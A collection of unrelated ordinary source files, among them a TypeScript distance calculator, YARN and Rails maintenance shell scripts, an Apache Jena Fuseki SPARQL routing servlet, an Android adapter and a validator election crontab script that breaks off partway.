const unitList: Units[] = ['km', 'kilometers', 'kilometers', 'm', 'meters', 'meter', 'metre', 'cm', 'centimeter', 'centimeters', 'mi', 'mile', 'miles', 'feet', 'ft', 'in', 'inch', 'inches', 'yd', 'yard', 'yards']
class DistanceFrom {
private distance: Result<number, Error> = Failure(new Error("Destination is not configured, run distFrom.to()."))
constructor( private origin: Position ) { }
degreeToRadians(degrees: number = 0) {
// Math.PI / 180
if (isNaN(degrees)) {
throw new Error('Must input valid number for degrees')
}
return degrees * 0.017453292519943295
}
// This implementation originally appeared at http://www.movable-type.co.uk/scripts/latlong.html
// Courtesy of @chrisveness
distanceInKm(lat1: number, lon1: number, lat2: number, lon2: number) {
// A = sin²(Δφ/2) + cos(φ1)⋅cos(φ2)⋅sin²(Δλ/2)
// δ = 2·atan2(√(a), √(1−a))
// see mathforum.org/library/drmath/view/51879.html for derivation
const sine = (num: number) => Math.sin(num / 2)
const cos = (num: number) => Math.cos(num)
const radius = 6371
const φ1 = this.degreeToRadians(lat1)
const λ1 = this.degreeToRadians(lon1)
const φ2 = this.degreeToRadians(lat2)
const λ2 = this.degreeToRadians(lon2)
const Δφ = φ2 - φ1
const Δλ = λ2 - λ1
const a = sine(Δφ) * sine(Δφ) + cos(φ1) * cos(φ2) * Math.pow(sine(Δλ), 2)
return 2 * Math.atan2(Math.sqrt(a), Math.sqrt(1 - a)) * radius
}
to( destination: Position) {
if (!Array.isArray(this.origin)) {
throw new Error('Must use array of [lat, lng] for origin')
}
if (!Array.isArray(destination)) {
throw new Error('Must use array of [lat, lng] for destination')
}
this.distance = Success(
this.distanceInKm(
this.origin[0],
this.origin[1],
destination[0],
destination[1]
)
)
return this
}
validUnits(unit: Units) {
if (unit) {
if (typeof unit !== 'string') {
throw new Error('Unit must be type of string')
}
return this.unitList().indexOf(unit) >= 0
}
throw new Error('Must input a unit to determine if valid')
}
in( units: Units ) {
return this.distance
.bind( distance =>
this.validUnits(units) ?
Success<number, Error>(distance)
:
Failure<number, Error>(new Error('Need to use valid units, run distFrom.unitList() to see list'))
)
.bind( distance => {
if (units === 'mi' || units === 'mile' || units === 'miles')
return distance * 0.6213712
else if (units === 'm' || units === 'meter' || units === 'meters' || units === 'metre')
return distance * 1000
else if (units === 'cm' || units === 'centimeter' || units === 'centimeters')
return distance * 100000
else if (units === 'in' || units === 'inch' || units === 'inches')
return distance * 39370.1
else if (units === 'ft' || units === 'feet')
return distance * 3280.84
else if (units === 'yd' || units === 'yard' || units === 'yards')
return distance * 1093.61
else
return distance
})
.getOrThrow()
}
unitList() {
return unitList.slice()
}
}
module.exports = function (val: Position) {
return new DistanceFrom(val)
}
|
#!/bin/bash
SERVICE=$1
function main {
case "$1" in
ALL)
stopAllServices
;;
OLD)
stopOldServices
;;
*)
stopInQueue $1
;;
esac
}
function stopAllServices {
# Get all the application IDs into the variable 'result' whose state is RUNNING
result=$(yarn application -list -appStates RUNNING | awk 'NR>2 {print $1}')
for applicationId in $result
#For all the application IDs, run the yarn kill command
do
stopInQueue $applicationId
done
printf "All jobs are killed"
}
function stopOldServices {
# Get all the application IDs into the variable 'result' whose state is RUNNING
result=$(yarn application -list -appStates RUNNING | awk 'NR>2 {print $1}')
nowTime=$(($(date +%s%N)/1000000))
for applicationId in $result
#For all the application IDs, run the yarn kill command
do
applicationStartTime=$(yarn application -status $applicationId |grep "Start-Time" |cut -d ' ' -f 3)
minusTime=$(expr $nowTime - $applicationStartTime)
if (( $minusTime > 259200000 ))
then
stopInQueue $applicationId
printf "Stopped OLD: $applicationId "
else
printf "Keep NEW: $applicationId "
fi
done
# Clear spark history logs
#hdfs dfs -rm -r -skipTrash /spark-history/*
}
function stopInQueue {
#Find the applicaitonId running in the supplied queue name
#jobInQueue=$1
#applicationId=$(yarn application -list -appStates RUNNING | awk -v tempJob=$jobInQueue '$5 == tempJob {print $1}')
applicationId=$1
#If queue name found, kill the application else report the message
if [ ! -z $applicationId ]
then
yarn application -kill $applicationId
sleep 2
hdfs dfs -rm -r -f -skipTrash /spark-history/$applicationId*
else
printf "Queue name didn't match. Please check your input queue name\n"
fi
}
main $SERVICE
|
<gh_stars>1-10
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import tvcm_stub
from trace_viewer import trace_viewer_project
class SpyProject(trace_viewer_project.TraceViewerProject):
spy_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
'..'))
def __init__(self):
super(SpyProject, self).__init__(
[self.spy_path])
|
import * as React from 'react';
import { MenuItem } from "../../queries";
export const SubmenuContext = React.createContext<{ addSubmenuItem: (item: MenuItem) => void }>({} as any);
|
import pandas as pd
import numpy as np
from sklearn.linear_model import LinearRegression
# Read the dataset
data = pd.read_csv('data.csv')
# Separate the features and targets
X = data.iloc[:, 0:4] # independent variables
y = data.iloc[:, 4] # target variable
# Create an instance of a linear regression model
model = LinearRegression()
# Fit model to training data
model.fit(X, y)
# Make predictions
predictions = model.predict(X)
# Determine whether a customer should be contacted or not
contacted = np.where(predictions > 0.5, "Yes", "No")
print(contacted) |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.jena.fuseki.servlets;
import static java.lang.String.format ;
import static org.apache.jena.riot.WebContent.contentTypeSPARQLQuery ;
import static org.apache.jena.riot.WebContent.contentTypeSPARQLUpdate ;
import java.io.IOException ;
import java.util.List ;
import javax.servlet.ServletException ;
import javax.servlet.http.HttpServletRequest ;
import javax.servlet.http.HttpServletResponse ;
import org.apache.jena.atlas.web.MediaType ;
import org.apache.jena.fuseki.DEF ;
import org.apache.jena.fuseki.Fuseki ;
import org.apache.jena.fuseki.FusekiException ;
import org.apache.jena.fuseki.conneg.ConNeg ;
import org.apache.jena.fuseki.server.DataAccessPoint ;
import org.apache.jena.fuseki.server.DataService ;
import org.apache.jena.fuseki.server.Endpoint ;
import org.apache.jena.fuseki.server.OperationName ;
import org.apache.jena.riot.web.HttpNames ;
/** This servlet can be attached to a dataset location
* and acts as a router for all SPARQL operations
* (query, update, graph store, both direct and
* indirect naming, quads operations on a dataset and
* ?query and ?update directly on a dataset.)
*/
public abstract class SPARQL_UberServlet extends ActionSPARQL
{
protected abstract boolean allowQuery(HttpAction action) ;
protected abstract boolean allowUpdate(HttpAction action) ;
protected abstract boolean allowREST_R(HttpAction action) ;
protected abstract boolean allowREST_W(HttpAction action) ;
protected abstract boolean allowQuadsR(HttpAction action) ;
protected abstract boolean allowQuadsW(HttpAction action) ;
public static class ReadOnly extends SPARQL_UberServlet
{
public ReadOnly() { super() ; }
@Override protected boolean allowQuery(HttpAction action) { return true ; }
@Override protected boolean allowUpdate(HttpAction action) { return false ; }
@Override protected boolean allowREST_R(HttpAction action) { return true ; }
@Override protected boolean allowREST_W(HttpAction action) { return false ; }
@Override protected boolean allowQuadsR(HttpAction action) { return true ; }
@Override protected boolean allowQuadsW(HttpAction action) { return false ; }
}
public static class ReadWrite extends SPARQL_UberServlet
{
public ReadWrite() { super() ; }
@Override protected boolean allowQuery(HttpAction action) { return true ; }
@Override protected boolean allowUpdate(HttpAction action) { return true ; }
@Override protected boolean allowREST_R(HttpAction action) { return true ; }
@Override protected boolean allowREST_W(HttpAction action) { return true ; }
@Override protected boolean allowQuadsR(HttpAction action) { return true ; }
@Override protected boolean allowQuadsW(HttpAction action) { return true ; }
}
public static class AccessByConfig extends SPARQL_UberServlet
{
public AccessByConfig() { super() ; }
@Override protected boolean allowQuery(HttpAction action) { return isEnabled(action, OperationName.Query) ; }
@Override protected boolean allowUpdate(HttpAction action) { return isEnabled(action, OperationName.Update) ; }
@Override protected boolean allowREST_R(HttpAction action) { return isEnabled(action, OperationName.GSP_R) || isEnabled(action, OperationName.GSP_RW) ; }
@Override protected boolean allowREST_W(HttpAction action) { return isEnabled(action, OperationName.GSP_RW) ; }
@Override protected boolean allowQuadsR(HttpAction action) { return isEnabled(action, OperationName.Quads_R) || isEnabled(action, OperationName.Quads_RW) ; }
@Override protected boolean allowQuadsW(HttpAction action) { return isEnabled(action, OperationName.Quads_RW) ; }
// Test whether there is a configuration that allows this action as the operation given.
// Ignores the operation in the action (set due to parsing - it might be "quads"
// which is the generic operation when just the dataset is specificed.
private boolean isEnabled(HttpAction action, OperationName opName) {
// Disregard the operation name of the action
DataService dSrv = action.getDataService() ;
if ( dSrv == null )
return false;
return ! dSrv.getOperation(opName).isEmpty() ;
}
}
/* This can be used for a single servlet for everything (über-servlet)
*
* It can check for a request that looks like a service request and passes it on.
* This takes precedence over direct naming.
*/
private final ActionSPARQL queryServlet = new SPARQL_QueryDataset() ;
private final ActionSPARQL updateServlet = new SPARQL_Update() ;
private final ActionSPARQL uploadServlet = new SPARQL_Upload() ;
private final ActionSPARQL gspServlet_R = new SPARQL_GSP_R() ;
private final ActionSPARQL gspServlet_RW = new SPARQL_GSP_RW() ;
private final ActionSPARQL restQuads_R = new REST_Quads_R() ; // XXX
private final ActionSPARQL restQuads_RW = new REST_Quads_RW() ;
public SPARQL_UberServlet() { super(); }
private String getEPName(String dsname, List<String> endpoints) {
if (endpoints == null || endpoints.size() == 0)
return null ;
String x = endpoints.get(0) ;
if ( ! dsname.endsWith("/") )
x = dsname+"/"+x ;
else
x = dsname+x ;
return x ;
}
// These calls should not happen because we hook in at executeAction
@Override protected void validate(HttpAction action) { throw new FusekiException("Call to SPARQL_UberServlet.validate") ; }
@Override protected void perform(HttpAction action) { throw new FusekiException("Call to SPARQL_UberServlet.perform") ; }
/** Map request to uri in the registry.
* null means no mapping done
*/
@Override
protected String mapRequestToDataset(HttpAction action) {
String uri = ActionLib.removeContextPath(action) ;
return ActionLib.mapRequestToDatasetLongest$(uri) ;
}
/** Intercept the processing cycle at the point where the action has been set up,
* the dataset target decided but no validation or execution has been done,
* nor any stats have been done.
*/
@Override
protected void executeAction(HttpAction action) {
long id = action.id ;
HttpServletRequest request = action.request ;
HttpServletResponse response = action.response ;
String actionURI = action.getActionURI() ; // No context path
String method = request.getMethod() ;
DataAccessPoint desc = action.getDataAccessPoint() ;
DataService dSrv = action.getDataService() ;
// if ( ! dSrv.isActive() )
// ServletOps.error(HttpSC.SERVICE_UNAVAILABLE_503, "Dataset not currently active");
// Part after the DataAccessPoint (dataset) name.
String trailing = findTrailing(actionURI, desc.getName()) ;
String qs = request.getQueryString() ;
boolean hasParams = request.getParameterMap().size() > 0 ;
// Test for parameters - includes HTML forms.
boolean hasParamQuery = request.getParameter(HttpNames.paramQuery) != null ;
// Include old name "request="
boolean hasParamUpdate = request.getParameter(HttpNames.paramUpdate) != null || request.getParameter(HttpNames.paramRequest) != null ;
boolean hasParamGraph = request.getParameter(HttpNames.paramGraph) != null ;
boolean hasParamGraphDefault = request.getParameter(HttpNames.paramGraphDefault) != null ;
String ct = request.getContentType() ;
String charset = request.getCharacterEncoding() ;
MediaType mt = null ;
if ( ct != null )
mt = MediaType.create(ct, charset) ;
if (action.log.isInfoEnabled() ) {
//String cxt = action.getContextPath() ;
action.log.info(format("[%d] %s %s :: '%s' :: %s ? %s", id, method, desc.getName(), trailing, (mt==null?"<none>":mt), (qs==null?"":qs))) ;
}
boolean hasTrailing = ( trailing.length() != 0 ) ;
if ( !hasTrailing && !hasParams ) {
// REST dataset.
boolean isGET = method.equals(HttpNames.METHOD_GET) ;
boolean isHEAD = method.equals(HttpNames.METHOD_HEAD) ;
// Check enabled.
if ( isGET || isHEAD ) {
if ( allowREST_R(action) )
restQuads_R.executeLifecycle(action) ;
else
ServletOps.errorMethodNotAllowed("Read-only dataset : "+method) ;
return ;
}
// If the read-only server has the same name as the writable server,
// and the default fro a read-only server is "/data", like a writable dataset,
// this test is insufficient.
if ( allowREST_W(action) )
restQuads_RW.executeLifecycle(action) ;
else
ServletOps.errorMethodNotAllowed("Read-only dataset : "+method) ;
return ;
}
if ( !hasTrailing ) {
boolean isPOST = action.getRequest().getMethod().equals(HttpNames.METHOD_POST) ;
// Nothing after the DataAccessPoint i.e Dataset by name.
// e.g. http://localhost:3030/ds?query=
// Query - GET or POST.
// Query - ?query= or body of application/sparql-query
if ( hasParamQuery || ( isPOST && contentTypeSPARQLQuery.equalsIgnoreCase(ct) ) ) {
// SPARQL Query
if ( !allowQuery(action) )
ServletOps.errorMethodNotAllowed("SPARQL query : "+method) ;
executeRequest(action, queryServlet) ;
return ;
}
// Insist on POST for update.
// Update - ?update= or body of application/sparql-update
if ( isPOST && ( hasParamUpdate || contentTypeSPARQLUpdate.equalsIgnoreCase(ct) ) ) {
// SPARQL Update
if ( !allowUpdate(action) )
ServletOps.errorMethodNotAllowed("SPARQL update : "+method) ;
executeRequest(action, updateServlet) ;
return ;
}
// ?graph=, ?default
if ( hasParamGraph || hasParamGraphDefault ) {
doGraphStoreProtocol(action) ;
return ;
}
ServletOps.errorBadRequest("Malformed request") ;
ServletOps.errorMethodNotAllowed("SPARQL Graph Store Protocol : "+method) ;
}
final boolean checkForPossibleService = true ;
if ( checkForPossibleService && action.getEndpoint() != null ) {
// There is a trailing part.
// Check it's not the same name as a registered service.
// If so, dispatch to that service.
if ( serviceDispatch(action, OperationName.Query, queryServlet) ) return ;
if ( serviceDispatch(action, OperationName.Update, updateServlet) ) return ;
if ( serviceDispatch(action, OperationName.Upload, uploadServlet) ) return ;
if ( hasParams ) {
if ( serviceDispatch(action, OperationName.GSP_R, gspServlet_R) ) return ;
if ( serviceDispatch(action, OperationName.GSP_RW, gspServlet_RW) ) return ;
} else {
// No parameters - do as a quads operation on the dataset.
if ( serviceDispatch(action, OperationName.GSP_R, restQuads_R) ) return ;
if ( serviceDispatch(action, OperationName.GSP_RW, restQuads_RW) ) return ;
}
}
// There is a trailing part - params are illegal by this point.
if ( hasParams )
// ?? Revisit to include query-on-one-graph
//errorBadRequest("Can't invoke a query-string service on a direct named graph") ;
ServletOps.errorNotFound("Not found: dataset='"+printName(desc.getName())+
"' service='"+printName(trailing)+
"' query string=?"+qs);
// There is a trailing part - not a service, no params ==> GSP direct naming.
if ( ! Fuseki.GSP_DIRECT_NAMING )
ServletOps.errorNotFound("Not found: dataset='"+printName(desc.getName())+"' service='"+printName(trailing)+"'");
doGraphStoreProtocol(action);
}
/** See if the operation is enabled for this setup.
* Return true if dispatched
*/
private boolean serviceDispatch(HttpAction action, OperationName opName, ActionSPARQL servlet) {
Endpoint operation = action.getEndpoint() ;
if ( operation == null )
return false ;
if ( ! operation.isType(opName) )
return false ;
// Handle OPTIONS specially.
// if ( action.getRequest().getMethod().equals(HttpNames.METHOD_OPTIONS) ) {
// // See also ServletBase.CORS_ENABLED
// //action.log.info(format("[%d] %s", action.id, action.getMethod())) ;
// setCommonHeadersForOptions(action.getResponse()) ;
// ServletOps.success(action);
// return true ;
// }
executeRequest(action, servlet) ;
return true ;
}
private String printName(String x) {
if ( x.startsWith("/") )
return x.substring(1) ;
return x ;
}
private void doGraphStoreProtocol(HttpAction action) {
// The GSP servlets handle direct and indirect naming.
Endpoint operation = action.getEndpoint() ;
String method = action.request.getMethod() ;
// Try to route to read service.
if ( HttpNames.METHOD_GET.equalsIgnoreCase(method) ||
HttpNames.METHOD_HEAD.equalsIgnoreCase(method) )
{
// Graphs Store Protocol, indirect naming, read operations
// Try to send to the R service, else drop through to RW service dispatch.
if ( ! allowREST_R(action))
ServletOps.errorForbidden("Forbidden: SPARQL Graph Store Protocol : Read operation : "+method) ;
executeRequest(action, gspServlet_R) ;
return ;
}
// Graphs Store Protocol, indirect naming, write (or read, though actually handled above)
// operations on the RW service.
if ( ! allowREST_W(action))
ServletOps.errorForbidden("Forbidden: SPARQL Graph Store Protocol : "+method) ;
executeRequest(action, gspServlet_RW) ;
return ;
}
private void executeRequest(HttpAction action, ActionSPARQL servlet) {
if ( true ) {
// Execute an ActionSPARQL.
// Bypasses HttpServlet.service to doMethod dispatch.
servlet.executeLifecycle(action) ;
return ;
}
if ( false ) {
// Execute by calling the whole servlet mechanism.
// This causes HttpServlet.service to call the appropriate doMethod.
// but the action, and the id, are not passed on and a ne one is created.
try { servlet.service(action.request, action.response) ; }
catch (ServletException | IOException e) {
ServletOps.errorOccurred(e);
}
}
}
protected static MediaType contentNegotationQuads(HttpAction action) {
MediaType mt = ConNeg.chooseContentType(action.request, DEF.quadsOffer, DEF.acceptNQuads) ;
if ( mt == null )
return null ;
if ( mt.getContentType() != null )
action.response.setContentType(mt.getContentType());
if ( mt.getCharset() != null )
action.response.setCharacterEncoding(mt.getCharset()) ;
return mt ;
}
/** Find part after the dataset name: service name or the graph (direct naming) */
protected String findTrailing(String uri, String dsname) {
if ( dsname.length() >= uri.length() )
return "" ;
return uri.substring(dsname.length()+1) ; // Skip the separating "/"
}
// Route everything to "doCommon"
@Override
protected void doHead(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doGet(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doPost(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doOptions(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doPut(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doDelete(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
}
|
<reponame>lananh265/social-network
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ic_schedule_send = void 0;
var ic_schedule_send = {
"viewBox": "0 0 24 24",
"children": [{
"name": "path",
"attribs": {
"d": "M0 0h24v24H0V0z",
"fill": "none"
},
"children": []
}, {
"name": "path",
"attribs": {
"d": "M16.5 12.5H15v4l3 2 .75-1.23-2.25-1.52V12.5zM16 9L2 3v7l9 2-9 2v7l7.27-3.11C10.09 20.83 12.79 23 16 23c3.86 0 7-3.14 7-7s-3.14-7-7-7zm0 12c-2.75 0-4.98-2.22-5-4.97v-.07c.02-2.74 2.25-4.97 5-4.97 2.76 0 5 2.24 5 5S18.76 21 16 21z"
},
"children": []
}]
};
exports.ic_schedule_send = ic_schedule_send; |
package biz.franch.protoi2.lists;
import android.content.Context;
import android.graphics.Bitmap;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.BaseAdapter;
import android.widget.ImageView;
import com.nostra13.universalimageloader.core.DisplayImageOptions;
import com.nostra13.universalimageloader.core.display.FadeInBitmapDisplayer;
import com.nostra13.universalimageloader.core.display.RoundedBitmapDisplayer;
import com.nostra13.universalimageloader.core.listener.ImageLoadingListener;
import com.nostra13.universalimageloader.core.listener.SimpleImageLoadingListener;
import com.squareup.picasso.Picasso;
import java.util.ArrayList;
import java.util.Collections;
import java.util.LinkedList;
import java.util.List;
import biz.franch.protoi2.R;
import de.hdodenhof.circleimageview.CircleImageView;
/**
* Created by Admin on 24.06.2015.
*/
public class AdapterGridServices extends BaseAdapter{
ArrayList<AttributesList> arrayLists;
LayoutInflater inflater;
Context context;
private ImageLoadingListener animateFirstListener = new AnimateFirstDisplayListener();
private DisplayImageOptions options;
public AdapterGridServices(Context context, ArrayList<AttributesList> arrayLists) {
this.context = context;
this.arrayLists = arrayLists;
inflater = LayoutInflater.from(context);
options = new DisplayImageOptions.Builder()
.showImageOnLoading(R.drawable.ic_stub)
.showImageForEmptyUri(R.drawable.ic_empty)
.showImageOnFail(R.drawable.ic_error)
.cacheInMemory(true)
.cacheOnDisk(true)
.considerExifParams(true)
.displayer(new RoundedBitmapDisplayer(20)).build();
}
@Override
public int getCount() {
return arrayLists.size();
}
@Override
public Object getItem(int i) {
return arrayLists.get(i);
}
@Override
public long getItemId(int i) {
return 0;
}
@Override
public View getView(int position, View convertView, ViewGroup parent) {
ViewHolder view;
if(convertView==null) {
view = new ViewHolder();
convertView = inflater.inflate(R.layout.item_lists_view_grid, null);
view.imageView = (CircleImageView) convertView.findViewById(R.id.imageViewGrid);
convertView.setTag(view);
}
else {
view = (ViewHolder) convertView.getTag();
}
// ImageLoader.getInstance().displayImage(arrayLists.get(position).getUrlImage(), view.imageView, options, animateFirstListener);
Picasso.with(context)
.load(arrayLists.get(position).getUrlImage())
.into(view.imageView);
return convertView;
}
public class ViewHolder {
public CircleImageView imageView;
}
private static class AnimateFirstDisplayListener extends SimpleImageLoadingListener {
static final List<String> displayedImages = Collections.synchronizedList(new LinkedList<String>());
@Override
public void onLoadingComplete(String imageUri, View view, Bitmap loadedImage) {
if (loadedImage != null) {
ImageView imageView = (ImageView) view;
boolean firstDisplay = !displayedImages.contains(imageUri);
if (firstDisplay) {
FadeInBitmapDisplayer.animate(imageView, 500);
displayedImages.add(imageUri);
}
}
}
}
}
|
<reponame>Pharma-Go/back-end
import { Module } from '@nestjs/common';
import { EstablishmentService } from './establishment.service';
import { TypeOrmModule } from '@nestjs/typeorm';
import { Establishment } from './establishment.entity';
import { EstablishmentController } from './establishment.controller';
import { ProductModule } from 'src/product/product.module';
import { UserModule } from 'src/user/user.module';
import { CategoryModule } from 'src/category/category.module';
@Module({
imports: [
TypeOrmModule.forFeature([Establishment]),
UserModule,
CategoryModule,
ProductModule,
],
controllers: [EstablishmentController],
providers: [EstablishmentService],
exports: [EstablishmentService],
})
export class EstablishmentModule {}
|
#!/bin/sh
# Make these available via Settings in the app
export SETTINGS__GIT_COMMIT="$APP_GIT_COMMIT"
export SETTINGS__BUILD_DATE="$APP_BUILD_DATE"
export SETTINGS__GIT_SOURCE="$APP_BUILD_TAG"
case ${DOCKER_STATE} in
create)
echo "running create"
bundle exec rails db:setup
;;
migrate)
echo "running migrate"
bundle exec rails db:migrate
;;
development-setup)
echo "setting up db"
rails db:setup
echo "migrating db"
rails db:migrate
echo "seeding db for dev"
rails db:seed
;;
reset)
if [[ "$ENV" = staging || "$ENV" = prod ]]
then
echo "cannot reset DB in staging or prod, see"
echo "https://dsdmoj.atlassian.net/wiki/display/CD/Resetting+the+DB+in+Deployed+Environments"
echo "for instructions on how to do this manually."
else
echo "running DB reset"
bundle exec rails db:reset
fi
;;
esac
bundle exec puma -C config/puma.rb
|
mkdir build
cd build
cmake .. -DCMAKE_BUILD_TYPE=Debug
make
|
#!/usr/bin/env bash
set -eE
# (C) Sergey Tyurin 2021-10-19 10:00:00
# Disclaimer
##################################################################################################################
# You running this script/function means you will not blame the author(s)
# if this breaks your stuff. This script/function is provided AS IS without warranty of any kind.
# Author(s) disclaim all implied warranties including, without limitation,
# any implied warranties of merchantability or of fitness for a particular purpose.
# The entire risk arising out of the use or performance of the sample scripts and documentation remains with you.
# In no event shall author(s) be held liable for any damages whatsoever
# (including, without limitation, damages for loss of business profits, business interruption,
# loss of business information, or other pecuniary loss) arising out of the use of or inability
# to use the script or documentation. Neither this script/function,
# nor any part of it other than those parts that are explicitly copied from others,
# may be republished without author(s) express written permission.
# Author(s) retain the right to alter this disclaimer at any time.
##################################################################################################################
echo
echo "############################## Set crontab for next elections ##################################"
echo "INFO: $(basename "$0") BEGIN $(date +%s) / $(date +'%F %T %Z')"
# ===================================================
SCRIPT_DIR=`cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P`
source "${SCRIPT_DIR}/env.sh"
source "${SCRIPT_DIR}/functions.shinc"
SCRPT_USER=$USER
USER_HOME=$HOME
[[ -z "$SCRPT_USER" ]] && SCRPT_USER=$LOGNAME
[[ -n $(echo "$USER_HOME"|grep 'root') ]] && SCRPT_USER="root"
#=================================================
echo -e "$(DispEnvInfo)"
echo
echo -e "$(Determine_Current_Network)"
echo
[[ ! -d $ELECTIONS_WORK_DIR ]] && mkdir -p $ELECTIONS_WORK_DIR
[[ ! -d $ELECTIONS_HISTORY_DIR ]] && mkdir -p $ELECTIONS_HISTORY_DIR
# ===================================================
function GET_M_H() {
OS_SYSTEM=`uname -s`
ival="${1}"
if [[ "$OS_SYSTEM" == "Linux" ]];then
echo "$(date +'%M %H' -d @$ival)"
else
echo "$(date -r $ival +'%M %H')"
fi
}
#######################################################################################################
#===================================================
# Get current electoin cycle info
elector_addr=$(Get_Elector_Address)
echo "INFO: Elector Address: $elector_addr"
election_id=$(Get_Current_Elections_ID)
echo "INFO: Current Election ID: $election_id"
if $FORCE_USE_DAPP ;then
ELECT_TIME_PAR=$($CALL_TC -j getconfig 15)
LIST_CURR_VALS=$($CALL_TC -j getconfig 34)
LIST_NEXT_VALS=$($CALL_TC -j getconfig 36)
declare -i CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | jq -r '.utime_until'` # utime_until
if [[ "$election_id" == "0" ]];then
CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | jq -r '.utime_since'` # utime_until
if [[ "$(echo "${LIST_NEXT_VALS}"|head -n 1)" != 'null' ]];then
CURR_VAL_UNTIL=`echo "${LIST_NEXT_VALS}" | jq -r '.utime_since'` # utime_since
fi
fi
declare -i VAL_DUR=`echo "${ELECT_TIME_PAR}" | jq -r '.validators_elected_for'` # validators_elected_for
declare -i STRT_BEFORE=`echo "${ELECT_TIME_PAR}" | jq -r '.elections_start_before'` # elections_start_before
declare -i EEND_BEFORE=`echo "${ELECT_TIME_PAR}" | jq -r '.elections_end_before' ` # elections_end_before
else
case "$NODE_TYPE" in
RUST)
ELECT_TIME_PAR=$($CALL_RC -j -c "getconfig 15"|sed 's/config param: //')
LIST_CURR_VALS=$($CALL_RC -j -c "getconfig 34"|sed 's/config param: //')
LIST_NEXT_VALS=$($CALL_RC -j -c "getconfig 36"|sed 's/config param: //')
declare -i CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | jq -r '.p34.utime_until'` # utime_until
if [[ "$election_id" == "0" ]];then
CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | jq -r '.p34.utime_since'` # utime_until
if [[ "$(echo "${LIST_NEXT_VALS}"|head -n 1)" != '{}' ]];then
CURR_VAL_UNTIL=`echo "${LIST_NEXT_VALS}" | jq -r '.p36.utime_since'` # utime_since
fi
fi
declare -i VAL_DUR=`echo "${ELECT_TIME_PAR}" | jq -r '.p15.validators_elected_for'` # validators_elected_for
declare -i STRT_BEFORE=`echo "${ELECT_TIME_PAR}" | jq -r '.p15.elections_start_before'` # elections_start_before
declare -i EEND_BEFORE=`echo "${ELECT_TIME_PAR}" | jq -r '.p15.elections_end_before' ` # elections_end_before
;;
CPP)
# ConfigParam(34) = (
# cur_validators:(validators_ext utime_since:1632812112 utime_until:1632822912 total:16 main:16 total_weight:1152921504606846968
ELECT_TIME_PAR=`$CALL_LC -rc "getconfig 15" -t "3" -rc "quit" 2>/dev/null`
LIST_CURR_VALS=`$CALL_LC -rc "getconfig 34" -t "3" -rc "quit" 2>/dev/null`
LIST_NEXT_VALS=`$CALL_LC -rc "getconfig 36" -t "3" -rc "quit" 2>/dev/null`
declare -i CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | grep -i "cur_validators" | awk -F ":" '{print $4}'|awk '{print $1}'` # utime_until
NEXT_VAL_EXIST=`echo "${LIST_NEXT_VALS}"| grep -i "ConfigParam(36)" | grep -i 'null'` # Config p36: null
if [[ "$election_id" == "0" ]];then
CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | grep -i "cur_validators" | awk -F ":" '{print $3}'|awk '{print $1}'` # utime_until
if [[ -z "$NEXT_VAL_EXIST" ]];then
CURR_VAL_UNTIL=`echo "${LIST_NEXT_VALS}" | grep -i "next_validators" | awk -F ":" '{print $3}'|awk '{print $1}'` # next utime_since = curr utime_until
fi
fi
declare -i VAL_DUR=`echo "${ELECT_TIME_PAR}" | grep -i "ConfigParam(15)" | awk -F ":" '{print $2}' |awk '{print $1}'` # validators_elected_for
declare -i STRT_BEFORE=`echo "${ELECT_TIME_PAR}" | grep -i "ConfigParam(15)" | awk -F ":" '{print $3}' |awk '{print $1}'` # elections_start_before
declare -i EEND_BEFORE=`echo "${ELECT_TIME_PAR}" | grep -i "ConfigParam(15)" | awk -F ":" '{print $4}' |awk '{print $1}'` # elections_end_before
;;
*)
echo "###-ERROR(line $LINENO): Unknown node type! Set NODE_TYPE= to 'RUST' or CPP' in env.sh"
exit 1
;;
esac
fi
#===================================================
#
PREV_ELECTION_TIME=$((CURR_VAL_UNTIL - STRT_BEFORE + TIME_SHIFT + DELAY_TIME))
PREV_ELECTION_SECOND_TIME=$(($PREV_ELECTION_TIME + $TIME_SHIFT))
PREV_ADNL_TIME=$(($PREV_ELECTION_SECOND_TIME + $TIME_SHIFT))
PREV_BAL_TIME=$(($PREV_ADNL_TIME + $TIME_SHIFT))
PREV_CHG_TIME=$(($PREV_BAL_TIME + $TIME_SHIFT))
PRV_ELECT_1=$(GET_M_H "$PREV_ELECTION_TIME")
PRV_ELECT_2=$(GET_M_H "$PREV_ELECTION_SECOND_TIME")
PRV_ELECT_3=$(GET_M_H "$PREV_ADNL_TIME")
PRV_ELECT_4=$(GET_M_H "$PREV_BAL_TIME")
PRV_ELECT_5=$(GET_M_H "$PREV_CHG_TIME")
#===================================================
#
NEXT_ELECTION_TIME=$((CURR_VAL_UNTIL + VAL_DUR - STRT_BEFORE + $TIME_SHIFT + DELAY_TIME))
NEXT_ELECTION_SECOND_TIME=$(($NEXT_ELECTION_TIME + $TIME_SHIFT))
NEXT_ADNL_TIME=$(($NEXT_ELECTION_SECOND_TIME + $TIME_SHIFT))
